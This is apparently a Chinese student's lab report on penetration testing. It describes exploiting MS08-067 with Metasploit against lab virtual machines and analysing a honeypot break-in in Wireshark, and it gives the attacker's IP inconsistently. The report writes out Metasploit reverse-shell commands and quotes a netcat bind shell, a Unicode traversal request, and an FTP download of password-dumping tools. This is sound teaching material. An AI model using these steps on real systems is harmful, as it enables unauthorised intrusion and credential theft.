20252808 2025-2026-2 《网络攻防实践》第六次作业
20252808 2025-2026-2 《网络攻防实践》第六次作业
一. 实验内容
1.1 实验内容概述
动手实践Metasploit windows attacker
使用metasploit软件进行windows远程渗透统计实验:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
1.2 实验相关知识概述
1. Metasploit
①架构:Metasploit 是一个强大的渗透测试框架,由模块(如漏洞利用模块、辅助模块、载荷模块等)组成。不同模块各司其职,比如漏洞利用模块用于针对特定漏洞发起攻击,载荷模块负责在目标系统上执行特定操作。
②使用流程:使用 Metasploit 进行攻击时,一般流程是先选择合适的漏洞利用模块,然后配置目标系统的相关参数(如 IP 地址),接着选择合适的载荷(比如获取目标系统权限的载荷),最后执行攻击命令。
2.渗透测试
渗透测试是一种在授权情况下,通过模拟黑客攻击手段,对目标系统进行安全评估的方法。它能发现系统存在的安全漏洞,帮助企业和组织提前修复,增强安全性。
3.漏洞原理
例如MS08 - 067 漏洞,是 Windows Server 服务中的 RPC 接口在处理特定请求时存在缓冲区溢出问题,攻击者利用这个漏洞可在目标系统上执行任意代码,进而获取系统控制权。理解漏洞原理是进行渗透攻击和防御的基础。
二. 实验过程
2.1 动手实践Metasploit windows attacker
启动靶机winXP和攻击机kali,查看到靶机ip地址为192.168.200.6,攻击机ip地址为192.168.200.4,测试二者之间的连通性正常


在Kali虚拟机中使用以下命令打开Metasploit,并启动msfconsole,并进入其控制台界面:
service postgresql start //启动PostgreSQL服务
msfdb init //初始化Metasploit PostgreSQL数据库
msfconsole //启动metasploit
成功启动数据库

成功启动metasploit

输入命令use windows/smb/ms08_067_netapi //将ms08_067作为目标漏洞,然后输入命令show payloads显示可攻击载荷




输入命令show options查看需要设置的参数,即攻击机与靶机的IP地址


输入命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接,然后输入命令set LHOST 192.168.200.4设置渗透攻击的主机是kali,输入命令set RHOST 192.168.200.6设置渗透攻击的靶机WinXP
输入命令show targets查看可设置的操作系统类型

输入命令exploit开始渗透攻击,成功渗透到靶机WinXP

攻击成功

2.2 取证分析实践:解码一次成功的NT系统破解攻击
将学习通上下载的文件拷贝到kali虚拟机中,使用wireshark打开刚刚拷贝的文件

2.2.1 HTTP
使用过滤条件ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http过滤数据


跟踪HTTP数据流

右键选择Follow—>HTTP流查看详细信息

看到cmd1.exe ?/c+nc+ -l -p 6969 -e+cmd1.exe HTTP/1.1命令,发现端口为6969

2.2.2 TCP
选择跟踪一个数据包的TCP数据流

这里决定跟踪eq 7,右键选择Follow—>TCP流查看详细信息

发现存在特殊字符%C0%AF。

%C0%AF 为Unicode 编码。由此可以判断:攻击者在SESSION中成功进行了Unicode攻击,打开NT系统并启动文件boot.ini,其request为:GET /guest/default,asp/…%C0%AF./…%C0%AF…/…%C0%AF…/boot.ini HTTP/1.1。因此可以判断存在Unicode编码漏洞攻击。
继续跟踪数据流,这里决定跟踪eq 11 。

查看发现有shell语句和"ADM!ROX!YOUR!WORLD"。

此为RDS漏洞。该漏洞可导致攻击者远程执行用户系统的命令,并以设备用户的身份运行,由msadc.pl/msadc2.pl 渗透攻击工具发起的攻击。根据“ADM!ROX!YOURIWORLD”特征字符串,可以判断此次攻击是由rain forest puppy 编写的 msadc(2).pl 渗透攻击代码所发起的,攻击者从此获取并成功进入了shell。之后,攻击者将会确认目标系统提供Web服务的是ⅡSv4.0,并存在Unicode 和 MDAC RDS 安全漏洞,进行进一步渗透攻击。
继续跟踪数据流,这里决定跟踪eq 106,同上述一样,右键选择Follow—>TCP流查看详细信息。

可以看出到攻击者通过创建了ftpcom脚本,使用ftp连接http://www.nether.net/ ,并以johna2k为用户haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll。


继续跟踪数据流,这里决定跟踪eq 178,查看TCP数据流时发现其是蜜罐主机。

2.2.3 使用 http.request.uri contains “msadc” 进行筛选跟踪
可以看到攻击机成功上传了工具

2.2.4 FTP
筛选跟踪FTP连接,发现直到编号1106才连接成功。

2.3 团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
攻击机kali ip地址:192.168.43.193(蒋乐乐)
靶机Win2k ip地址: 192.168.43.184 (叶姜祺)
根据上述实验一中的实验过程,对对方IP地址的Win2kServer靶机进行攻击。
在Kali虚拟机中使用msfconsole命令打开Metasploit。


使用以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权:
use exploit/windows/smb/ms08_067_netapi

使用以下命令显示可用的攻击负载
show payloads

使用以下命令,选择以下攻击负载以实现反向连接
set payload generic/shell_reverse_tcp

三. 学习中遇到的问题及解决
问题1:kali无法与Win2kServer连接成功。
解决方案:花费很长时间仍不行,最后使用WinXP作为靶机进行实验,实验成功。详情可见2.1.2中第2小节。
问题2:在团队实践中攻击实验显示攻击无法成功。
解决方案:检查后发现是命令中攻击机与靶机IP地址输入反了,更改后重新攻击即成功。详情可见2.3.2中第2小节。
四. 学习感悟、思考等
在本次实验中,实验目标主要是学习掌握网络攻防技术中如何使用msfconsole工具对于靶机的漏洞攻击,并分析了一次成功的NT系统破解攻击,在实验最后还与同学进行了攻防实战的演练。
在实验过程中,我了解到相关的漏洞技术以及防范和应对漏洞攻击的方法,对Windows系统远程渗透攻击的理解进一步加深。
通过这次实验,我加深了对于网络攻防技术的知识学习,进一步巩固了相关知识,为后面开展网络攻防实验打下坚实的基础。
浙公网安备 33010602011771号